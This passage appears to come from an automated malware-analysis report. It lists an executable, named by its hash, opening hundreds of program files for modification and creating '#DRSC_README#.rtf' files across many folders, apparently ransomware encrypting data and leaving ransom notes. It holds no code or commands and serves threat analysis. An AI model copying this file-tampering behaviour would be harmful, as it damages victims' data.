Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\el.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ja.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_200_percent.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\gu.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrome.7z 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\SyncGet.wmf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\tr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program 